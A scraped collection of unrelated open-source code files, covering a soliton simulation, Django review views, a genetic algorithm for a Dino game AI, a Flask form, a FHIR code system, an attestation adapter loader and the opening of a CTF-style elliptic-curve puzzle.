[\"1000.wav\", \"100.wav\"][size == 3], sn[0] + EXTENTION )\n return sn + EXTENTION\n \n\ndef play(sound_file):\n sound_file = AudioDirectory + sound_file\n pygame.init()\n song = pygame.mixer.Sound(sound_file)\n clock = pygame.time.Clock()\n song.play()\n i = 80\n while i > 0:\n clock.tick(60)\n i -= 1\n pygame.quit()\n\n\n","repo_name":"alhasapi/FULFULDE-CALC","sub_path":"sound_manger.py","file_name":"sound_manger.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27830388632","text":"print(\"Python version 3.6.4\")\n\n# Project 3: Dynamics of Solitons\n\nimport math\n\nprint(\"Math version for python 3.6.4\")\n\nimport numpy as np\n\nprint(\"Numpy version: \" + str(np.__version__))\n\nimport matplotlib.pyplot as plt\n\nimport matplotlib.axes as ax\n\nimport matplotlib.animation as animation\n\nfrom matplotlib.colors import LogNorm\n\nfrom math import log10, floor\n\nprint(\"matplotlib version for python 3.6.4\")\n\n# a) program to propagate the pulse using Runge Kutta 4th order discretisation\n\n# Parameters of the problem\n\nalpha = 9.0\n\ndx = 0.15\n\ndt = dx**3\n\nx = np.arange(0,40,dx)\n\n#conditions for 
different results-----------------------------------------------------------------\n\nwavebreak = False\n\nplotcmap = False\n\nplotcmapcol = False\n\nplotsoliton = False\n\nanimate = False\n\nvelplot = False\n\nstabilityplot = False\n\nplotcmapwb = False\n\nshockwave = False\n\ndiff = False\n\nplotdiff = False\n\nnotdiff = True\n\n#periodic boundary conditions imposed by shifting the list ---------------------------------------\n\ndef shift(List, positions):\n\n return List[positions:] + List[:positions]\n\n#function for the derivative\n\ndef f(u,dx):\n \n \n #this is the du/dt\n \n if shockwave == True or notdiff == True:\n \n #shockwave term with no non-linear term\n\n return -0.25*(1/dx)*((np.array(shift(u,1)))**2-((np.array(shift(u,-1)))**2))\n\n elif diff == True:\n\n D = 2.0\n \n return -0.25*(1/dx)*((np.array(shift(u,1)))**2-((np.array(shift(u,-1)))**2)) + D*(1/(dx**2))*(np.array(shift(u,1)) - 2*np.array(u) + np.array(shift(u,-1)))\n\n else:\n\n #discretisation for KdeV\n \n return -0.25*(1/dx)*((np.array(shift(u,1)))**2-((np.array(shift(u,-1)))**2)) - 0.5*(1/(dx)**3)*(np.array(shift(u,2)) - 2*np.array(shift(u,1)) + 2*np.array((shift(u,-1))) - np.array((shift(u,-2))))\n\n# functions for evaluating Runge-Kutta\n\ndef k1(a,dt,dx):\n \n return dt*f(list(a),dx)\n\ndef k2(a,dt,dx):\n \n return dt*f(list(np.array(a) + 0.5*k1(a,dt,dx)),dx)\n\ndef k3(a,dt,dx):\n \n return dt*f(list(np.array(a) + 0.5*k2(a,dt,dx)),dx)\n\ndef k4(a,dt,dx):\n \n return dt*f(list(np.array(a) + k3(a,dt,dx)),dx)\n\n# this simply plots sin wave with only positive values--------------------------------------------------------------------------\n\ndef s():\n\n a = np.arange(0,80,0.1)\n\n #sine wave plotted with amplitude much less than period\n \n b = 5*np.sin((a)/20)\n\n c = list((b > 0) * b)\n\n #this simply fills list with zeros to match x axis plot in animation\n\n d = list(np.zeros(100)) + c + list(np.zeros(100))\n\n return d\n\ndef u(x,t,alpha):\n\n #standard initial wave form centered at x = 20 \n \n return 12*(alpha**2)*(1/math.cosh(alpha*(x - 20 - 4*(alpha**2)*t)))**2\n\n#initial condition calculated with the analytic solution\n\nuvalues1 = np.array([u(i,0,alpha) for i in x])\n\n#save the initial condition to be used to reset the check for stability\n\nuo = uvalues1\n \nif wavebreak == False:\n \n uvalues = uvalues1\n \nt = []\n\ntt = 0\n\nn = 100\n\ndxl = np.logspace(-10, 0.2, n)\n\ndtl = np.logspace(-10, 0.2, n)\n\ndef sta(dx,dt,uvalues):\n \n global uo\n \n if max(uvalues) < 0.99*max(uo) or max(uvalues) > 1.01*max(uo) or np.isnan(max(uvalues)):\n \n return 0\n \n else:\n \n return 1\n\ndef round_sig(x, sig=2):\n\n if x == 0:\n \n return 0\n \n else:\n \n return round(x, sig-int(floor(log10(abs(x))))-1)\n\nif stabilityplot == True:\n \n steps = 0\n \n smap = []\n \n stability = []\n \n counter = 0\n \n for k in dxl:\n \n for l in dtl:\n \n counter += 1\n \n print(counter)\n \n while steps <= 100:\n \n c = uvalues #list\n \n u = np.array(c) + (1/6)*(k1(c,l,k) + 2*(k2(c,l,k) + k3(c,l,k)) + k4(c,l,k)) #array\n \n # Store the new solution\n \n uvalues = list(u)\n\n outcome = sta(k,l, uvalues)\n\n if outcome == 0:\n\n #exit loop\n\n steps = 101\n \n steps += 1\n\n #reset intial conditions\n\n uvalues = uo\n\n stability.append(outcome)\n \n steps = 0\n \n smap.append(stability)\n\n stability = []\n\n #plot heat map\n\n fig1, ax1 = plt.subplots()\n\n locs, labels = plt.xticks()\n\n locs, labels = plt.yticks()\n\n plt.xticks([round_sig(x) for x in np.linspace(0,n,n/10)], [round_sig(x) for x in np.logspace(-10, 0.2, 
n/10)])\n\n plt.yticks([round_sig(x) for x in np.linspace(0,n,n/10)], [round_sig(x) for x in np.logspace(-10, 0.2, n/10)])\n\n aa = ax1.imshow(smap, origin='lower', cmap='rainbow')\n \n cbar = fig1.colorbar(aa, ax=ax1, extend='both')\n \n ax1.set_title(\"Stability for alpha = \" + str(alpha))\n \n ax1.set_xlabel(\"dt\")\n \n ax1.set_ylabel(\"dx\")\n \n plt.show()\n\n# Function needed to initiate the animation --------------------------------------------------------------------------\n\ndef init():\n \n line.set_ydata(uvalues)\n \n return line,\n\n# Calculation for animation --------------------------------------------------------------------------\n\ndef update(i):\n \n global unext, uvalues, dx, dt\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n \n # Update the plot\n \n line.set_ydata(list(unext)) # update the data\n \n text.set_text(r't = {:3}'.format(i*dt))\n \n plt.text(list(uvalues).index(max(uvalues)), max(uvalues), r't = {}'.format(0.0))\n \n # Store the new solution\n \n uvalues = list(unext)\n \n return line, text\n\n#running the animation ----------------------------------------------------------------------------\n\nif animate == True:\n \n # Preparing the plots\n \n fig, ax = plt.subplots()\n \n line_ini = ax.plot(x, uvalues, 'r')\n \n line, = ax.plot(x, uvalues)\n \n plt.title(\"Soliton propagation\")\n \n plt.text(max(x) - 20, max(uvalues), r'alpha = {:3.2}'.format(alpha))\n \n text = plt.text(10, max(uvalues), r't = {}'.format(0.0))\n \n plt.xlabel('x (m)')\n \n plt.ylabel('u')\n \n # Start the animation (and therefore the calculation)\n \n ani = animation.FuncAnimation(fig, update, frames=np.arange(0,100000000,1), init_func=init, blit=False, interval=1)\n\n plt.show()\n\n#for velocity calc -------------------------------------------------------------------------------\n\ndef velocityplot():\n\n global dt, dx, x\n\n v = []\n\n h = []\n\n #list of alphas for velocity plot\n\n alpha = np.linspace(0.1,3.0,12)\n\n #set time want to run each soliton for\n\n t = 0.06\n\n #counter for time in propagation\n\n j = 1\n\n for l in alpha:\n\n uvalues = np.array([u(i,0,l) for i in x])\n\n #initial value of peak\n\n xo = list(uvalues).index(max(uvalues))\n\n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n j += 1\n\n #now append velocity and alpha (height 12alpa^2)\n\n v.append(dx*(list(uvalues).index(max(uvalues)) - xo)/(j*dt))\n\n j = 1\n\n h.append(12*(l**(2)))\n\n x2 = np.array(h)\n\n y2 = np.array(v)\n\n A = np.vstack([x2, np.ones(len(x2))]).T\n \n m, c = np.linalg.lstsq(A, y2, rcond=None)[0]\n\n # Polynomial Regression\n \n def polyfit(x, y, degree):\n \n results = {}\n\n coeffs = np.polyfit(x, y, degree)\n\n # Polynomial Coefficients\n \n results['polynomial'] = coeffs.tolist()\n\n # r-squared\n \n p = np.poly1d(coeffs)\n \n # fit values, and mean\n \n yhat = p(x) \n \n ybar = np.sum(y)/len(y)\n \n ssreg = np.sum((yhat-ybar)**2)\n \n sstot = np.sum((y - ybar)**2)\n \n results['determination'] = ssreg / sstot\n\n return results\n\n r_value = polyfit(x2,y2,1)['determination']\n\n plt.figure()\n \n plt.scatter(x2,y2, s =6)\n \n plt.plot(x2, m*x2 + c, 'r', label='Fitted line,' + '\\n' + 'm = ' + str(m) + '\\n' + 'r = ' +str(r_value) + '\\n' + 'intercept = ' + str(c))\n\n plt.legend()\n\n plt.grid(True)\n\n plt.title(\" Velocity vs Height \")\n\n plt.xlabel(\"Height (m)\")\n\n 
plt.ylabel(\"Velocity (m/s)\")\n\n plt.xlim(0, max(x2))\n\n plt.ylim(0,max(y2))\n\n plt.show()\n\nif velplot == True:\n \n velocityplot()\n\n#plotting soliton propagation --------------------------------------------------------------------------\n\ndef plotsol(alpha,t,f):\n\n global x, dt, dx\n\n j = 0\n\n uvalues = np.array([u(i,0,alpha) for i in x])\n\n plt.figure()\n\n plt.plot(x,uvalues)\n\n plt.title(\"Soliton propagation with alpha = \" + str(alpha))\n \n plt.xlabel(\"x (m)\")\n \n plt.ylabel(\"u\")\n\n plt.text(list(uvalues).index(max(uvalues))*dx , max(uvalues), r't = {:3.2}'.format(j*dt))\n\n i = 1\n \n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n tt = j*dt\n\n if tt > i*f:\n \n plt.plot(x,unext)\n \n plt.text(list(unext).index(max(unext))*dx , max(unext), r't = {:3.2}'.format(j*dt))\n \n i += 1\n\n j += 1\n\n plt.show()\n\n#alpha = 2, run with (2.0,2.1,0.5)\n\n#alpha = 3, run with (3.0,1,0.3)\n\nif plotsoliton == True:\n \n plotsol(3.0,1,0.3)\n\n#heat map ----------------------------------------------------------------------------------------\n\ndef umap(alpha,t,x):\n \n global dt, dx\n\n j = 0\n\n umap = []\n\n tg = []\n\n uvalues = np.array([u(i,0,alpha) for i in x])\n\n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n umap.append(uvalues)\n\n tg.append(j*dt)\n\n j += 1\n\n fig1, ax1 = plt.subplots()\n \n aa = ax1.imshow(umap, extent = [0,len(x)*dx,0,len(tg)*dt], origin='lower', cmap='rainbow')\n \n cbar = fig1.colorbar(aa, ax=ax1, extend='both')\n\n if plotdiff == True:\n\n ax1.set_title(\"Soliton diffusion shockwave\")\n\n elif notdiff == True:\n\n ax1.set_title(\"Soliton shockwave\")\n\n else:\n\n ax1.set_title(\"Soliton colour map with alpa = \" +str(alpha))\n \n ax1.set_xlabel(\"x (m)\")\n \n ax1.set_ylabel(\"t (s)\")\n \n plt.show()\n\nif plotcmap == True:\n \n umap(1.0,30,np.arange(0,30,dx))\n\n#heat map for collisions--------------------------------------------------------------------------\n\ndef umapcol(alpha, alpha2, t):\n \n global dt, dx\n\n x = np.arange(0,30,dx)\n\n j = 0\n\n umap = []\n\n tg = []\n\n uvalues1 = np.array([u(i,0,alpha) for i in x])\n\n #add another soliton\n \n uvalues2 = np.array([u(i-5,0,alpha2) for i in x])\n\n uvalues = list(uvalues1 + uvalues2)\n \n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n umap.append(uvalues)\n\n tg.append(j*dt)\n\n j += 1\n\n fig1, ax1 = plt.subplots()\n \n aa = ax1.imshow(umap, extent = [0,len(x)*dx,0,len(tg)*dt], origin='lower', cmap='rainbow')\n \n cbar = fig1.colorbar(aa, ax=ax1, extend='both')\n \n ax1.set_title(\"Soliton colour map with alpa = \" +str(alpha) + \", \" + str(alpha2))\n \n ax1.set_xlabel(\"x (m)\")\n \n ax1.set_ylabel(\"t (s)\")\n \n plt.show()\n\nif plotcmapcol == True:\n \n umapcol(1.0,1.2,30)\n \n#wavebreaking will be checked with sine wave ------------------------------------------------------\n\ndef wavebreakplot(t,f):\n \n global x, dt, dx\n\n j = 0\n\n ppos = [50,90]\n\n uvalues = s()\n\n x = np.arange(0,100,0.1)\n\n plt.figure()\n\n plt.plot(x,uvalues)\n\n plt.title(\"Wave breaking with a sine wave\")\n \n plt.xlabel(\"x (m)\")\n \n plt.ylabel(\"u\")\n\n plt.text(list(uvalues).index(max(uvalues))*dx - 200*dx, max(uvalues), r't = 
{:3.2}'.format(j*dt))\n\n i = 1\n\n k = 0\n \n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n tt = j*dt\n\n if tt > i*f:\n \n plt.plot(x,unext)\n \n plt.text(ppos[k], max(unext), r't = {:3.2}'.format(j*dt))\n\n k += 1\n \n i += 8\n\n j += 1\n\n plt.show()\n\nif wavebreak == True:\n \n wavebreakplot(20,2)\n\n#heat map ----------------------------------------------------------------------------------------\n\ndef umapwb(t):\n \n global dt, dx\n\n x = np.arange(0,100,dx)\n\n j = 0\n\n umap = []\n\n tg = []\n\n uvalues = s()\n\n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n umap.append(uvalues)\n\n tg.append(j*dt)\n\n j += 1\n\n fig1, ax1 = plt.subplots()\n \n aa = ax1.imshow(umap, extent = [0,len(x)*dx,0,len(tg)*dt], origin='lower', cmap='rainbow')\n \n cbar = fig1.colorbar(aa, ax=ax1, extend='both')\n \n ax1.set_title(\"Wave breaking colour map\")\n \n ax1.set_xlabel(\"x (m)\")\n \n ax1.set_ylabel(\"t (s)\")\n \n plt.show()\n\nif plotcmapwb == True:\n\n umapwb(60)\n\n#shock wave with soliton ------------------------------------------------------------------------\n\ndef shockwaveplot(t,f):\n \n global x, dt, dx\n\n j = 0\n\n x = np.arange(0, 100, dx)\n\n uvalues = np.array([u(i,0,1.0) for i in x])\n\n plt.figure()\n\n plt.plot(x,uvalues)\n\n plt.title(\"Shock wave with a soliton\")\n \n plt.xlabel(\"x (m)\")\n \n plt.ylabel(\"u\")\n\n i = 1\n \n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n tt = j*dt\n\n if tt > i*f:\n \n plt.plot(x,unext)\n \n i += 19\n\n j += 1\n\n plt.show()\n\nif shockwave == True:\n \n shockwaveplot(50,2)\n\n\n#make this shock wave with diffusion ------------------------------------------------------------------------\n\n#animate the diffusive term\n\ndef shockwaveplotdiff(t,f):\n \n global x, dt, dx\n\n j = 0\n\n x = np.arange(0, 100, dx)\n\n uvalues = np.array([u(i,0,1.0) for i in x])\n\n plt.figure()\n\n plt.plot(x,uvalues)\n\n plt.title(\"Shock wave with a soliton\")\n \n plt.xlabel(\"x (m)\")\n \n plt.ylabel(\"u\")\n\n i = 1\n \n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n tt = j*dt\n\n if tt > i*f:\n \n plt.plot(x,unext)\n \n i += 40\n\n j += 1\n\n plt.show()\n\nif diff == True and plotdiff == False:\n \n shockwaveplotdiff(40,0.2)\n\nif diff == True and plotdiff == True:\n\n umap(1.0,60,np.arange(0,60,dx))\n\nif notdiff == True:\n\n umap(1.0,40,np.arange(0,60,dx))\n\n \n\n \n \n\n\n\n \n\n \n\n\n \n\n \n","repo_name":"mhal1/Solitons","sub_path":"Soliton.py","file_name":"Soliton.py","file_ext":"py","file_size_in_byte":15438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"30223980132","text":"from django.db.models import Avg\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom checkout.models import Order, OrderLineItem\nfrom review.models import ReviewRating\nfrom products.models import Product, Category\n\nfrom review.forms import 
ReviewForm\n\n\n@login_required\ndef order_view(request):\n \"\"\"Show all orders for the requested user\"\"\"\n\n orders = Order.objects.filter(user_profile__user=request.user).order_by('-id')\n return render(request, \"review/order_list.html\", {\"orders\": orders, 'categories': Category.objects.all()})\n\n@login_required\ndef order_details(request, order_number):\n \"\"\"A view to show the details of a specific order\"\"\"\n\n order_item = OrderLineItem.objects.filter(order__order_number=order_number, order__user_profile__user=request.user)\n return render(request, \"review/order_details.html\", {\"order_item\": order_item, 'categories': Category.objects.all()})\n\n@login_required\ndef submit_review(request):\n \"\"\"A view to submit a review\"\"\"\n\n url = request.META.get('HTTP_REFERER')\n if request.method == 'POST':\n form = ReviewForm(request.POST)\n if form.is_valid():\n data = ReviewRating(\n order_item= form.cleaned_data['order_item'], \n rating= form.cleaned_data['rating'], \n review= form.cleaned_data['review']\n )\n data.save()\n\n # calculate review of the product\n # and save into product model\n avg_rating = ReviewRating.objects.filter(order_item__product=data.order_item.product).annotate(ave_price=Avg('rating'))\n Product.objects.filter(pk=data.order_item.product.id).update(rating=avg_rating[0].rating)\n\n messages.success(request, 'Thank you! Your review has been submitted.')\n return redirect(url)","repo_name":"Iacopo454/Shoes-shop","sub_path":"review/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"24132760357","text":"import numpy as np\r\nfrom Dino import *\r\n\r\n# Step 1: Create initial population\r\ndef create_new_population(population_size):\r\n active_dinos = []\r\n all_dinos = []\r\n\r\n for i in range(population_size):\r\n dino = Dino()\r\n active_dinos.append(dino) # important that both lists contain the same dinos\r\n all_dinos.append(dino)\r\n\r\n return all_dinos, active_dinos\r\n\r\n# Step 2: Selection\r\ndef calculate_fitness(all_dinos):\r\n # get all dino scores and calculate for each dino\r\n # a normalized fitness score\r\n\r\n for dino in all_dinos:\r\n dino.score = dino.score**2\r\n\r\n sum = 0\r\n for dino in all_dinos:\r\n sum += dino.score\r\n\r\n for dino in all_dinos:\r\n dino.fitness = dino.score / sum\r\n\r\n return all_dinos\r\n\r\ndef create_mating_pool(all_dinos):\r\n # create a mating pool based on the dinos fitness\r\n # The higher the dino is in fitness, the more often it will be\r\n # represented in the mating pool. Therefore it will be selected\r\n # more often for reproduction (Step 3)\r\n\r\n # The creation of the this mating_pool leads to an exponential split in\r\n # fitness. The fittest dinos are exponentially represented. Therefore in the\r\n # long run, when only few Dinos make it far, only these will be able to\r\n # reproduce.\r\n\r\n mating_pool = []\r\n for dino in all_dinos:\r\n f = int(dino.fitness * len(all_dinos) * 10)\r\n for i in range(f):\r\n mating_pool.append(dino)\r\n\r\n # Sort mating pool by dino's fitness. 
Fittest dino becomes first element\r\n mating_pool = sorted(mating_pool, key = lambda dino: dino.fitness)[::-1]\r\n\r\n # natural selection: only the top 10% \"survive\" and are allowed to breed\r\n mating_pool = mating_pool[0:(len(mating_pool) // 10)]\r\n\r\n return mating_pool\r\n\r\n# Step 3: Reproduction\r\ndef create_next_generation(population_size, dino_mating_pool):\r\n\r\n all_dinos = []\r\n active_dinos = []\r\n\r\n def crossover(father_DNA, mother_DNA): # Crossover\r\n # Due to the design of the create_mating_pool-function crossover becomes\r\n # more and more insignificant. At the end only clones of the same dinos\r\n # mate.\r\n\r\n crossover_DNA = {}\r\n\r\n heritage_percentage = np.random.randint(11)*0.1\r\n\r\n for index in father_DNA.keys():\r\n # create a Deep copy of the father's DNA, so that the crossover_DNA\r\n # has the same shape as the former Generation\r\n crossover_DNA[index] = np.copy(father_DNA[index])\r\n\r\n orig_shape = father_DNA[index].shape\r\n for i in range(orig_shape[0]):\r\n for j in range(orig_shape[1]):\r\n if np.random.random() < heritage_percentage:\r\n crossover_DNA[index][i,j] = mother_DNA[index][i,j]\r\n\r\n return crossover_DNA\r\n\r\n def mutate(DNA):# Mutate\r\n\r\n def mutate_genome(S):\r\n orig_shape = S.shape\r\n for i in range(orig_shape[0]):\r\n for j in range(orig_shape[1]):\r\n if np.random.random() < mutation_rate:\r\n S[i,j] = np.random.randn() * mutation_magnitude\r\n\r\n return S.reshape(orig_shape)\r\n\r\n mutation_rate = 0.05\r\n # A higher mutation_rate leads to longer\r\n # stagnation at the beginning, but leads to faster game progressing in the long\r\n # run (fewer Dinos survive up until the higher tiers). A lower mutation_rate\r\n # leads to faster initial progress, but to slower longterm progress.\r\n # Any mutation_rate higher then 0.09 leads to longterm stagnation.\r\n\r\n mutation_magnitude = 0.1\r\n\r\n mutated_DNA = {}\r\n\r\n for i in DNA.keys(): # Mutate the DNA\r\n mutated_DNA[i] = mutate_genome(np.copy(DNA[i]))\r\n\r\n return mutated_DNA\r\n\r\n for i in range(population_size):\r\n\r\n # select random mating partners\r\n a = np.random.randint(0, len(dino_mating_pool))\r\n b = np.random.randint(0, len(dino_mating_pool))\r\n\r\n # Crossover and Mutation\r\n father_DNA = {}\r\n mother_DNA = {}\r\n\r\n for i in dino_mating_pool[0].brain.neural_wiring.keys():\r\n # The father's and the mother's DNA (neural wiring) are copied from the selected\r\n # Dinos from the dino_mating_pool.\r\n father_DNA[i] = np.copy(dino_mating_pool[a].brain.neural_wiring[i])\r\n mother_DNA[i] = np.copy(dino_mating_pool[b].brain.neural_wiring[i])\r\n\r\n crossover_DNA = crossover(father_DNA, mother_DNA)\r\n child_DNA = mutate(crossover_DNA)\r\n\r\n # create a new child\r\n child = Dino()\r\n\r\n # inherit crossover-mutated DNA\r\n for i in child.brain.neural_wiring.keys():\r\n child.brain.neural_wiring[i] = child_DNA[i]\r\n\r\n all_dinos.append(child)\r\n active_dinos.append(child)\r\n\r\n return all_dinos, active_dinos\r\n","repo_name":"MaxLell/Chrome_Dino_AI","sub_path":"library/Genetic_Algorithm.py","file_name":"Genetic_Algorithm.py","file_ext":"py","file_size_in_byte":4878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"28994868020","text":"from datetime import date\nfrom flask_wtf import Form\nfrom wtforms import TextField, RadioField\nfrom wtforms.validators import Length, ValidationError\nfrom claimants_user_journey.forms.custom_field_types import CustomDateField\nfrom 
claimants_user_journey.forms.validators import CustomDateFieldValidator\n\n\nclass EmploymentDetails(Form):\n job_title = TextField('Job Title', validators=[Length(max=30)])\n _worker_type_options = [\n 'Employed',\n 'Labour-only Sub-contractor',\n 'Agency Worker',\n 'Fixed-term contracts worker',\n 'Director or Shareholder',\n 'Freelance worker',\n 'Casual worker',\n 'Home worker'\n ]\n type_of_worker = RadioField(\n 'What type of worker were you?',\n choices = [\n ('employed', 'Employed
You were employed under a contract of employment'),\n ('labour-only sub-contractor', 'Labour-only Sub-contractor
You were self employed and paid tax and national insurance on that basis'),\n ('agency worker', 'Agency Worker
You were working for the client of an agency'),\n ('fixed term contract', 'Fixed Term Contract
Your contract was for a specific period of time i.e. it had an end date'),\n ('director or shareholder', 'Director or Shareholder
You were an office holder of the company'),\n ('freelance', 'Freelance
You worked for yourself and the business was a client'),\n ('casual worker', 'Casual Worker
You worked for the employer as and when required'),\n ('home worker', 'Home Worker
You worked from home but attended an office for meetings')\n ],\n )\n start_date = CustomDateField(label=\"When did you start working for this employer?\", validators=[CustomDateFieldValidator()])\n end_date = CustomDateField(label=\"When did your employment end?\", validators=[CustomDateFieldValidator(start_date_field_name='start_date')])\n","repo_name":"InsolvencyService/rps-alpha","sub_path":"rps/claimants_user_journey/forms/employment_details.py","file_name":"employment_details.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"11654245823","text":"import configparser\nimport importlib\nimport sys\n\nconfig = configparser.ConfigParser()\nconfig.read('config/config.ini')\n\nclasses = {}\n\n# Import all adapters (the name of the att_tech attribute of an entity must match the name of one of the adapters' scripts)\n# Adapters must be specified in the config/config.ini file:\n# [adapters]\n# file_name = class_name\ndef refresh_adapters():\n for module in config[\"adapters\"].keys():\n class_ = config[\"adapters\"][module]\n try:\n classes[module] = getattr(importlib.import_module(\".\"+module, \"adapters\"), class_) #__import__(\"adapters.\"+module, fromlist=[module]), class_\n except:\n print(\"Adapter \" + module + \" NOT found!\", file=sys.stderr)\n\n\ndef register_entity(entity, whitelist, verifier):\n\n refresh_adapters()\n \n if verifier[\"att_tech\"] in classes.keys():\n if hasattr(classes[verifier[\"att_tech\"]], 'register') and callable(getattr(classes[verifier[\"att_tech\"]], 'register')):\n classes[verifier[\"att_tech\"]].register(entity, whitelist, verifier)\n else:\n return {\"error\" : \"no register() method found for \" + verifier[\"att_tech\"] + \" adapter\"} \n else:\n return {\"error\" : \"no adapter found for attestation technology \" + verifier[\"att_tech\"] }\n\ndef verify_entity(entity, verifier, whitelist, se, topic):\n\n refresh_adapters()\n\n if verifier[\"att_tech\"] in classes.keys():\n if hasattr(classes[verifier[\"att_tech\"]], 'register') and callable(getattr(classes[verifier[\"att_tech\"]], 'register')):\n classes[verifier[\"att_tech\"]].attest(entity, verifier, whitelist, se, topic)\n else:\n return {\"error\" : \"no attest() method found for \" + verifier[\"att_tech\"] + \" adapter\"} \n else:\n return {\"error\" : \"no adapter found for attestation technology \" + verifier[\"att_tech\"] }\n\ndef delete_entity(entity, verifier):\n\n refresh_adapters()\n\n if entity[\"att_tech\"] in classes.keys():\n if hasattr(classes[entity[\"att_tech\"]], 'delete') and callable(getattr(classes[entity[\"att_tech\"]], 'delete')):\n classes[entity[\"att_tech\"]].delete(entity, verifier)\n else:\n return {\"error\" : \"no delete() method found for \" + entity[\"att_tech\"] + \" adapter\"} \n else:\n return {\"error\" : \"no adapter found for attestation technology \" + entity[\"att_tech\"] }\n\ndef status(verifier):\n\n refresh_adapters()\n\n if verifier[\"att_tech\"] in classes.keys():\n if hasattr(classes[verifier[\"att_tech\"]], 'status') and callable(getattr(classes[verifier[\"att_tech\"]], 'status')):\n classes[verifier[\"att_tech\"]].status(verifier)\n else:\n return {\"error\" : \"no status() method found for \" + verifier[\"att_tech\"] + \" adapter\"} \n else:\n return {\"error\" : \"no adapter found for attestation technology \" + verifier[\"att_tech\"] 
}","repo_name":"H2020-FISHY/trust-monitor","sub_path":"adapters_connector.py","file_name":"adapters_connector.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"23167270941","text":"from pathlib import Path\n\nfrom fhir.resources.codesystem import CodeSystem\n\nfrom oops_fhir.utils import CodeSystemConcept\n\n\n__all__ = [\"LibraryType\"]\n\n_resource = CodeSystem.parse_file(Path(__file__).with_suffix(\".json\"))\n\n\nclass LibraryType:\n \"\"\"\n LibraryType\n\n The type of knowledge asset this library contains.\n\n Status: draft - Version: 4.0.1\n\n Copyright None\n\n http://terminology.hl7.org/CodeSystem/library-type\n \"\"\"\n\n logic_library = CodeSystemConcept(\n {\n \"code\": \"logic-library\",\n \"definition\": \"The resource is a shareable library of formalized knowledge.\",\n \"display\": \"Logic Library\",\n }\n )\n \"\"\"\n Logic Library\n\n The resource is a shareable library of formalized knowledge.\n \"\"\"\n\n model_definition = CodeSystemConcept(\n {\n \"code\": \"model-definition\",\n \"definition\": \"The resource is a definition of an information model.\",\n \"display\": \"Model Definition\",\n }\n )\n \"\"\"\n Model Definition\n\n The resource is a definition of an information model.\n \"\"\"\n\n asset_collection = CodeSystemConcept(\n {\n \"code\": \"asset-collection\",\n \"definition\": \"The resource is a collection of knowledge assets.\",\n \"display\": \"Asset Collection\",\n }\n )\n \"\"\"\n Asset Collection\n\n The resource is a collection of knowledge assets.\n \"\"\"\n\n module_definition = CodeSystemConcept(\n {\n \"code\": \"module-definition\",\n \"definition\": \"The resource defines the dependencies, parameters, and data requirements for a particular module or evaluation context.\",\n \"display\": \"Module Definition\",\n }\n )\n \"\"\"\n Module Definition\n\n The resource defines the dependencies, parameters, and data requirements for a particular module or evaluation context.\n \"\"\"\n\n class Meta:\n resource = _resource\n","repo_name":"Mikuana/oops_fhir","sub_path":"oops_fhir/r4/code_system/library_type.py","file_name":"library_type.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"29490497830","text":"from fastecdsa.curve import Curve\nfrom fastecdsa.point import Point\nfrom Crypto.Util.number import getPrime\nfrom Crypto.Random.random import randrange\n\nBITS = 80\n\nwhile True:\n\tp = getPrime(BITS)\n\tif p % 4 == 3:\n\t\tbreak\n\na, b = randrange(1, p), randrange(1, p)\nC = Curve(\"FCSC\", p, a, b, 0, 0, 0)\n\nwhile True:\n\txP = randrange(1, p)\n\tyP = (xP ** 3 + a * xP + b) % p\n\tif pow(yP, (p - 1) // 2, p) == 1:\n\t\tbreak\n\nyP = pow(yP, (p + 1) // 4, p)\nassert (xP ** 3 + a * xP + b - yP ** 2) % p == 0\n\nP = Point(xP, yP, C)\nQ = 2 * P\n\nprint(\"Can you find my secret curve 